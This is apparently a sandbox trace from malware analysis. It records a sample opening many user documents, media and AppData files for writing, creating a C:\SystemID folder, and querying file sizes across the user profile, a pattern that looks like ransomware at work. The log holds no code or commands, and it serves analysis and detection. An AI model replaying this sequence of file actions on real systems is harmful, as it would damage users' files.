Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\v2tEOgOZeF-wSXfUeb.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\ZNFPhs7VtfT6Wy.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\T0CQ8VVBC5Xi_UA\5 wO.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\T0CQ8VVBC5Xi_UA\xIlfywT2BL_f.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\70Jmk.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\F0eUqh0cOkUTa7DO.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\FN--.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\K_RwYW.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\NxEBIllQ9 cZLQxHAnf.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\xkuwOm0rA.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\ypdm7CG6ozW8_F3RQh.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\1m7527vbdeC.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\8jZ3LBgNvW1arBclEu8.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\axSg-zF.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\cSaVaB0sUlp.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\E5 Uz-9etUMMH3CKQC.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\EWTals.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\TK27wDdNd6Xfl 2b_k_.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\Wqelj SIFg-o4.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\kU7oVdD-q0QJXT.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\uYUuV.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\T0CQ8VVBC5Xi_UA\xt72dHYiX\-1 X.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\T0CQ8VVBC5Xi_UA\xt72dHYiX\u39sgkNzI3ujT06Y2kP.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\dbOCkvV1nk u.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\p-qIG.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\RBanc_ Xhdc-T.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\x46p.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\KevqRYRLai6W-uOAz\cpZgjv9AbFGPDH.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\KevqRYRLai6W-uOAz\rBf2xQ.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\B2EsvKtcKir28U.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\Jf 8.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\KIbJxOBGwieG.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\WTnDwa-D4KBHQUw.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\Kpmxx2VVkoY4H0fX.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\5rGtE2ND.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\ccASAQTIpPKgN.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\OTozEY.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\Xp-kb7abpIDOqh4\M5qZaTsTRd.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\Xp-kb7abpIDOqh4\ykO6fV_h.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\9vWEh.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\dH-l6u.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\KZ_Ff2.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\ziyBrxM6Ba3SqMjEYO.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\oADBIR\8KFC8j7.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\oADBIR\K KksBwzXVChJt.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\oADBIR\KiC_I4C.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\-upHLx loeeu-TB.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\8XX4ge15eOKpjI.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\POBuKqk7p3HVpix_cM.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\rM0K82IAegAWaw6N.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\f NqUp5_D7sMGe.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\h4Ure_SWB.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\RbKeEPsH8.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\shUk4EGQd0zRO ddsru9.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\tEhXK0.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\yboEd.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598 - True 1
Fn
Create Directory C:\SystemID - True 1
Fn
Get Info C:\SystemID\PersonalID.txt type = file_type True 1
Fn
Get Info C:\Boot\BCD.LOG1 type = size, size_out = 0 True 1
Fn
Get Info C:\Boot\BCD.LOG2 type = size, size_out = 0 True 1
Fn
Get Info C:\Boot\BOOTSTAT.DAT type = size, size_out = 65536 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact type = size, size_out = 1178 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact type = size, size_out = 68382 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact type = size, size_out = 1171 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact type = size, size_out = 1177 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact type = size, size_out = 1174 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact type = size, size_out = 1172 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\7FXGdv.mkv type = size, size_out = 87696 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\DfM1jMQH5m.m4a type = size, size_out = 18617 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eCYysFOHAuDPd0.odp type = size, size_out = 86236 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\fn3wxYGSmK_5.wav type = size, size_out = 18577 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gl-n 26G.bmp type = size, size_out = 19688 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\GMWkR.wav type = size, size_out = 33801 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\I TKCX nhSV2b.mp3 type = size, size_out = 15834 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KdF36F.avi type = size, size_out = 48538 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\kKP8D1f.mp3 type = size, size_out = 8630 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\nborqaG7LbY-8nT0ByEv.pps type = size, size_out = 78062 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\nXxNQgqy6gVdEPQ.bmp type = size, size_out = 91099 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\OjEEOfskM8q.m4a type = size, size_out = 38683 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Pdn3smOfWiyL_KFEcP0.mp4 type = size, size_out = 28382 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\PoDqxcM TSaz.swf type = size, size_out = 78819 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\TeVS.mp4 type = size, size_out = 16765 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\TyHbSH6VrF3xX.mp3 type = size, size_out = 83893 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uVeSXOWXfi_KaHM6.swf type = size, size_out = 93413 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uVgxMcsEjpWpZrN.jpg type = size, size_out = 23333 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wjaMa6Mk-99x.gif type = size, size_out = 81822 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Xe1YhHNVlwT k.wav type = size, size_out = 55066 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Xk2XWRW.flv type = size, size_out = 39162 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\_34_nkr.wav type = size, size_out = 29170 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\2 YiCSGLLTlIDeQ.doc type = size, size_out = 39421 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\3fgk.pps type = size, size_out = 98706 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\3kKQ7nGkbpOOq-1 5zRt.pptx type = size, size_out = 100211 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\45LEiyxnf Plrmb.docx type = size, size_out = 94955 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5Jnu XQUnVKH6.xlsx type = size, size_out = 92367 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5W-053pafC.pps type = size, size_out = 13827 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\AGokm2hLuNsPkZ.pptx type = size, size_out = 53376 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\BUziw_klSFTDwvC1Vm.pptx type = size, size_out = 90204 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Dtk7xvzoVk_gCAUAkb.xlsx type = size, size_out = 96198 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\EDFXHniYi.docx type = size, size_out = 89499 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\EGkqtCRNREaQo4XfBL.ods type = size, size_out = 67940 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\G-R5IPPjXNO2pufW-w.pptx type = size, size_out = 42800 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\k0bYHnrNfY0Z01.docx type = size, size_out = 94405 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kbQLv1HzRjuGX8_0 ow.pptx type = size, size_out = 63958 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\M0viuAr.pptx type = size, size_out = 22060 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mJD0Lk7dF2uj7fNWL.doc type = size, size_out = 9588 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mpW-3B9.xlsx type = size, size_out = 75845 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\NU9iOZGfDM.xlsx type = size, size_out = 81901 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ol37DpMB ADCzniH6.docx type = size, size_out = 50532 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\OlNTdQSKj.csv type = size, size_out = 24917 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rMkTON600uD2.docx type = size, size_out = 15094 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\umnYAxK8Hd5gj.pptx type = size, size_out = 4929 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yBWTsx0.xlsx type = size, size_out = 56376 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yNFdhsIRJWbx9.pptx type = size, size_out = 36247 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\-Utu5uTreh3_BFU.mp3 type = size, size_out = 85592 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\2ZgBE.wav type = size, size_out = 65510 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\3lDgGO6UTyrOsMHE.mp3 type = size, size_out = 22149 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\5V1FT5g1rxSJJ41de.m4a type = size, size_out = 5222 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\7HJiH UDq9SzzeN5I.m4a type = size, size_out = 67155 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\8ywMFiXrJ1mJNTYk.wav type = size, size_out = 76423 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\Fnpi8zzFvSVq9mHNij76.wav type = size, size_out = 13722 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\HX-X27lPA60A4.m4a type = size, size_out = 76970 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\i0vpbCxKUDj27FIiTrf.wav type = size, size_out = 1272 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\KbAGa_jf9A0p1.mp3 type = size, size_out = 17804 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\LgZcOmajdnsesY.m4a type = size, size_out = 29620 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\nexJic6.wav type = size, size_out = 89051 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\NN082DlMLC6MxmlQyS42.wav type = size, size_out = 59168 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\tbTKJ0ZxbS6wZlGEphR.wav type = size, size_out = 96736 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\ucbmmg-N-J.wav type = size, size_out = 52279 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\wAomAj1M-1.mp3 type = size, size_out = 63488 True 1
Fn
